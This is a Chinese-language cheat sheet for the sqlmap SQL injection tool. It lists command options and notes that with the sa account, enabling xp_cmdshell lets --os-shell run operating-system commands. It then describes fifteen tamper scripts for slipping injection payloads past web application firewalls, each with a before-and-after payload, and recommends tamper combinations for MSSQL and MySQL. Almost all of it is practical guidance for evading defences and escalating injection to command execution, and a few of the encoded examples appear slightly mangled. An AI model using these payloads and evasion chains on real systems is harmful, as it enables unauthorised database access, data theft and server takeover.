##–technique 指定注入所用技术 B布尔 E报错 U联合 S多语句 T时间 Q嵌套
##代理 --proxy “http://127.0.0.1:8080”
##–random-agent 随机头

–tamper=“between.py” 绕过脚本

sqlmap一把梭，https加上–force-ssl参数

-v 1-6 显示payload
如果当前用户为 sa，开启xp_cmdshell组件后可执行命令，通过 sqlmap 中的–os-shell自动化执行操作，查看权限发现当前用户为系统权限
1、apostrophemask.py
适用数据库：ALL

作用：将引号替换为utf-8，用于过滤单引号

使用脚本前：tamper(“1 AND ‘1’='1”)

使用脚本后：1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

2、base64encode.py
适用数据库：ALL

作用：替换base64编码

使用脚本前：tamper(“1’ AND SLEEP(5)#”)

使用脚本后：MScgQU5EIFNMRUVQKDUpIw==

3、multiplespaces.py
适用数据库：ALL

作用：围绕sql关键字添加多个空格

使用脚本前：tamper(‘1 UNION SELECT foobar’)

使用脚本后：1 UNION SELECT foobar

4、space2plus.py
适用数据库：ALL

作用:用加号替换空格

使用脚本前：tamper(‘SELECT id FROM users’)

使用脚本后：SELECT+id+FROM+users

5、space2randomblank.py
适用数据库：ALL

作用：将空格替换为其他随机有效字符

使用脚本前：tamper(‘SELECT id FROM users’)

使用脚本后：SELECT%0Did%0CFROM%0Ausers

6、unionalltounion.py
适用数据库：ALL

作用：将union all select 替换为union select

使用脚本前：tamper(‘-1 UNION ALL SELECT’)

使用脚本后：-1 UNION SELECT

7、space2dash.py
适用数据库：ALL

作用：将空格替换为破折号（–），并添加一个随机字符和换行符（\n）

使用脚本前：tamper(‘1 AND 9227=9227’)

适用脚本后：1–upgPydUzKpMX%0AAND–RcDKhIr%0A9227=9227

8、space2mssqlblank.py
适用数据库：mssql

测试数据库版本：Microsoft SQL Server 2000 、Microsoft SQL Server 2005

作用：将空格替换为有效字符集的随机空白字符(‘%01’, ‘%02’, ‘%03’, ‘%04’, ‘%05’, ‘%06’, ‘%07’, ‘%08’, ‘%09’, ‘%0B’, ‘%0C’, ‘%0D’, ‘%0E’, ‘%0F’, ‘%0A’)

使用脚本前：tamper(‘SELECT id FROM users’)

适用脚本后：SELECT%0Did%0DFROM%04users

9、between.py
测试数据库：Microsoft SQL Server 2005 、MySQL 4, 5.0 and 5.5、 Oracle 10g、 PostgreSQL 8.3, 8.4, 9.0

作用：将">“替换为"NOT BETWEEN 0 AND #”，将"=“替换为"BETWEEN # AND #”

使用脚本前：tamper(‘1 AND A > B–’)，tamper(‘1 AND A = B–’)

使用脚本后：1 AND A NOT BETWEEN 0 AND B–，1 AND A BETWEEN B AND B–

10、percentage.py
适用数据库：ASP

测试数据库：Microsoft SQL Server 2000, 2005 、MySQL 5.1.56, 5.5.11 、PostgreSQL 9.0

作用：在每个字符前加上一个%

使用脚本前：tamper(‘SELECT FIELD FROM TABLE’)

使用脚本后：%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

11、sp_password.py
适用数据库：mssql

作用：将sp_password追加到有效载荷后，以便从DBMS日志中自动混淆。

使用脚本前：tamper('1 AND 9227=9227-- ')

使用脚本后：1 AND 9227=9227-- sp_password

12、charencode.py
测试数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

作用：对指定的payload全部使用url编码（不处理已进行编码的字符）

使用脚本前：tamper(‘SELECT FIELD FROM%20TABLE’)

使用脚本后：%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

13、randomcase.py
测试数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0、SQLite 3

作用：将字符替换为随机大小写

使用脚本前：tamper(‘INSERT’)

使用脚本后：InSeRt

14、charunicodeencode.py
适用数据库：ASP 、ASP.NET

测试数据库：Microsoft SQL Server 2000 、Microsoft SQL Server 2005、MySQL 5.1.56 、PostgreSQL 9.0.3

作用：适用字符串的Unicode编码

使用脚本前：tamper(‘SELECT FIELD%20FROM TABLE’)

使用脚本后：%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

15、space2comment.py
测试数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

作用：将空格替换为/**/

使用脚本前：tamper(‘SELECT id FROM users’)

使用脚本后：SELECT//id//FROM/**/users

利用–tamper参数中的编码脚本

常见编码搭配方式

普通tamper搭配方式:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

–tamper=between,bluecoat,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

数据库为MSSQL的搭配方式:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

数据库为MySql的搭配方式:

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor